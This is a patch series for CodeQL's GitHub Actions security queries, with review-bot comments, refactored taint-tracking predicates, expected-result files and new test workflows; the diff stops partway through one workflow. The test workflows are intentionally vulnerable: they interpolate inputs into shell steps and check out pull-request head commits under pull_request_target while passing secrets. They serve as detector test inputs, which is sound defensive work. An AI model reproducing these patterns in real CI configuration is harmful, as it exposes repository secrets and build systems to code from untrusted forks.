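Review bot: `ActionsSHACheckoutConfig` has no QLDoc comment and repeats `isSink` and most of the third-party action table from `ActionsMutableRefCheckoutConfig`, so supporting a new action means editing two places and the lists can drift apart. A shared helper such as `private predicate isCheckoutRefSink(DataFlow::Node sink)`, used by both `isSink` members, would keep them aligned. The second module should get a comment like `/** A taint-tracking configuration for PR head/merge commit SHAs flowing into actions/checkout's ref argument. */`. The action names and output fields are bare string literals; a short comment per entry naming where the output is documented would make the table easier to audit.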
@@ -89,35 +173,9 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( - // ref argument contains the PR id/number or head ref/sha - exists(Expression e | - ( - containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) - ) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep step | - ( - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*(head_ref).*") - or - step.getCallee() = "potiuk/get-workflow-origin" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"]) - or - step.getCallee() = "github/branch-deploy" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%.ref%") - ) and - DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + exists(ActionsMutableRefCheckoutFlow::PathNode sink | + ActionsMutableRefCheckoutFlow::flowPath(_, sink) and + sink.getNode().asExpr() = this.getArgumentExpr("ref") ) or // heuristic base on the step id and field name 
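Review bot: The characteristic predicate of `ActionsMutableRefCheckout` calls `ActionsMutableRefCheckoutFlow::flowPath(_, sink)` only to test reachability; no path is reported from here. `exists(DataFlow::Node sink | ActionsMutableRefCheckoutFlow::flowTo(sink) and sink.asExpr() = this.getArgumentExpr("ref"))` expresses the same condition without materialising path nodes. The same applies to `ActionsSHACheckout` in the next hunk. The heuristic disjunct that follows is cut off at the end of this hunk.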
@@ -159,27 +217,9 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( - // ref argument contains the PR id/number or head ref/sha - exists(Expression e | - containsHeadSHA(e.getExpression()) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep step | - ( - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - this.getArgument("ref").regexpMatch(".*(head_sha).*") - or - step.getCallee() = "potiuk/get-workflow-origin" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"]) - ) and - DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + exists(ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(_, sink) and + sink.getNode().asExpr() = this.getArgumentExpr("ref") ) or // heuristic base on the step id and field name From a9a297ab78571f563890eb588136a1275d5b4c06 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:21 +0200 Subject: [PATCH 0499/1267] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 + .../CWE-094/CodeInjectionCritical.expected | 12 + .../CWE-094/CodeInjectionMedium.expected | 10 + .../.github/workflows/pr-workflow-fork.yaml | 27 + .../CWE-829/.github/workflows/pr-workflow.yml | 463 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 10 + .../UntrustedCheckoutCritical.expected | 37 ++ 7 files changed, 573 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml new file mode 100644 index 00000000000..bb873ca4eac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml @@ -0,0 +1,14 @@ +name: CI + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 69085548f69..2097a589b5a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -434,7 +444,9 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 360c33720fb..ce4d74467f9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml
new file mode 100644
index 00000000000..98c25f83231
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml
@@ -0,0 +1,27 @@
+name: "pr-workflow-fork"
+concurrency:
+ group: ${{ github.workflow }}-pr-workflow-fork-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+
+on:
+ pull_request_target:
+
+jobs:
+ pr-workflow-fork:
+ uses: ./.github/workflows/pr-workflow.yml
+ with:
+ github_event_name: ${{ github.event_name }}
+ github_event_pull_request_head_repo_id : ${{ github.event.pull_request.head.repo.id }}
+ github_workflow: $ {{ github.workflow }}
+ github_event_pull_request_head_sha: ${{ github.event.pull_request.head.sha }}
+ flow: ${{( github.event_name == 'push' && 'push' ) || ( github.event_name == 'merge_group' && 'merge_queue_check' ) || ( github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.id != 383289760 && 'pr_from_fork' ) || ( github.event_name == 'pull_request' && github.event.pull_request.head.repo.id == 383289760 && 'pr_from_branch' )}}
+ sha_to_check: ${{ github.event.pull_request.head.sha || github.sha }}
+
+ secrets:
+ CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }}
+ DOCKER_HUB_USERNAME: ${{ secrets.DOCKER_HUB_USERNAME }}
+ DOCKER_HUB_ACCESS_TOKEN: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ PABLO_PROJ_JSON: ${{ secrets.PABLO_PROJ_JSON }}
+ VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }}
+ CANCEL_GITHUB_TOKEN: ${{ github.token }}
+ NIXBUILD_TOKEN: ${{ secrets.NIXBUILD_TOKEN }}
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml
new file mode 100644
index 00000000000..061ff7d02c5
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml
@@ -0,0 +1,463 @@ +name: "pr-workflow" +concurrency: + group: ${{ github.workflow }}-pr-workflow-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true +on: + workflow_call: + inputs: + github_event_name: + required: true + type: string + github_event_pull_request_head_repo_id: + required: true + type: number + github_workflow: + required: true + type: string + github_event_pull_request_head_sha: + required: true + type: string + flow: + required: true + type: string + sha_to_check: + required: true + type: string + secrets: + NIXBUILD_TOKEN: + required: true + CACHIX_AUTH_TOKEN: + required: true + DOCKER_HUB_USERNAME: + required: true + DOCKER_HUB_ACCESS_TOKEN: + required: true + PABLO_PROJ_JSON: + required: true + VERCEL_TOKEN: + required: true + CANCEL_GITHUB_TOKEN: + required: true + +permissions: + pull-requests: write + +jobs: + dependency-review: + outputs: + ok: ${{ steps.ok.outputs.ok }} + concurrency: + group: ${{ inputs.github_workflow }}-dependency-review-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + needs: + - privilege-check + runs-on: + - ubuntu-latest + steps: + - name: checkout + uses: actions/checkout@v3 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + - uses: amannn/action-semantic-pull-request@v5 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + with: + requireScope: false + subjectPattern: (.*[a-zA-Z].*){16,} + subjectPatternError: | + https://regexper.com/#%28.*%5Ba-zA-Z%5D.*%29%7B16%2C%7D + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: dependency-review + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + uses: actions/dependency-review-action@v3 + with: + # GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396 are ignored because they are casued by the static Docusaurus build. Please remove when Docusaurus gets updated. 
+ # GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf are ignored because they are transitive dependencies still used by the master branch of Substrate. Please remove when Substrate update the according dependencies. + # GHSA-fjx5-qpf4-xjf2 is ignored because it is a transitive dependencies still used by the master branch of ibc-proto-rs. Please remove when ibc-rs-proto updates it. + allow-ghsas: GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396, GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf, GHSA-ff4p-7xrq-q5r8, GHSA-xm67-587q-r2vw, GHSA-fjx5-qpf4-xjf2 + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + privilege-check: + name: "privilege-check" + if: ${{ inputs.flow == 'push' || inputs.github_event_name == 'merge_group' || (inputs.github_event_name == 'pull_request_target' && inputs.github_event_pull_request_head_repo_id != 383289760) || (inputs.github_event_name == 'pull_request' && inputs.github_event_pull_request_head_repo_id == 383289760) }} + continue-on-error: false + runs-on: ubuntu-latest + steps: + - run: | + echo "${{ inputs.github_event_name }}"" + echo "${{ inputs.flow }}"" + echo "${{ github.ref_name }}" + echo "${{ inputs.github_event_pull_request_head_repo_id }}" + + lfs-check: + name: lfs-check + needs: + - privilege-check + continue-on-error: false + runs-on: ubuntu-latest + concurrency: + group: ${{ inputs.github_workflow }}-lfs-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + submodules: false + lfs: true + - uses: actionsdesk/lfs-warning@v3.2 + name: lfs-warning + with: + labelName: lfs-detected! 
+ filesizelimit: 20KB + exclusionPatterns: | + **/*.rs + **/*.ts + **/*.md + **/*.json + **/*.lock + **/*.nix + **/*.sol + **/*.toml + flake/eth-pos-devnet + - run: echo ${{ steps.lfs-warning.outputs.lfsFiles }} + + nix-flake-check: + name: "nix-flake-check" + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - ubuntu-latest-m + continue-on-error: false + concurrency: + group: ${{ inputs.github_workflow }}-nix-flake-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - run: | + nix --version + nix show-config + nix run .#nix-flake-check --accept-flake-config + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + # build-all-outputs-packages-arm: + # outputs: + # ok: ${{ steps.ok.outputs.ok }} + # name: build-all-outputs-packages-arm + # needs: + # - privilege-check + # runs-on: + # - aarch64-linux-80C-128GB-2048GB + # concurrency: + # group: ${{ inputs.github_workflow }}-build-all-outputs-packages-arm-${{ github.event.pull_request.number || github.ref }} + # cancel-in-progress: true + # steps: + # - name: Set up Cachix + # if: ${{ inputs.flow == 'push' }} + # uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + # with: + # authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + # name: composable + # installCommand: "true" + # - uses: actions/checkout@v3 + # if: ${{ inputs.flow == 'push' }} + # with: + # lfs: true + # ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + # persist-credentials: false + # - 
name: Build all packages + # if: ${{ inputs.flow == 'push' }} + # uses: "./.github/templates/watch-exec" + # with: + # command: nix -- build .#all-outputs + # - id: ok + # run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-outputs-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-outputs-packages + needs: + - privilege-check + - build-all-deps-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-outputs-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-outputs + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + build-all-checks-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-checks-packages + needs: + - privilege-check + - build-all-outputs-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-checks-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow 
== 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-checks + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-deps-packages: + name: build-all-deps-packages + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-deps-packages-${{ matrix.runner }}-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: build-all-deps-packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-deps + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + draft-release-check: + name: "draft-release-check" + if: ${{ failure() || cancelled() || success() }} + continue-on-error: false + runs-on: ubuntu-latest + needs: + - build-all-checks-packages + - dependency-review + - nix-flake-check + - mantis-e2e + steps: + - run: | + echo "nix-flake-check" ${{ needs.nix-flake-check.outputs.ok }} + echo "dependency-review" ${{ needs.dependency-review.outputs.ok 
}} + echo "build-all-checks-packages" ${{ needs.build-all-checks-packages.outputs.ok }} + echo "mantis-e2e" ${{ needs.mantis-e2e.outputs.ok }} + - if: ${{ needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' }} + run: | + echo "All dependencies built well" + exit 0 + - if: ${{ !(needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' ) }} + run: | + echo "Some of dependencies (see jobs graph, needs attributes, and output of this job) failed" + exit 42 + + draft-release-artifacts: + name: "draft-release-artifacts" + runs-on: + - x86_64-linux-32C-128GB-2TB + needs: + - draft-release-check + if: ${{ inputs.github_event_name == 'push' }} + permissions: + pull-requests: write + contents: write + concurrency: + group: ${{ inputs.github_workflow }}-draft-release-artifacts-${{ github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Login to DockerHub + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + - name: Download artifacts + run: | + nix run .#generate-release-artifacts --print-build-logs + + - name: Release artifacts + uses: softprops/action-gh-release@v1 + with: + draft: true + prerelease: false + fail_on_unmatched_files: true + generate_release_notes: true + body_path: release-artifacts/release.txt + name: ${{ github.ref_name }} + tag_name: ${{ github.ref_name }} + target_commitish: ${{ github.sha }} + files: | + release-artifacts/to-upload/* + + push-docker-images: + 
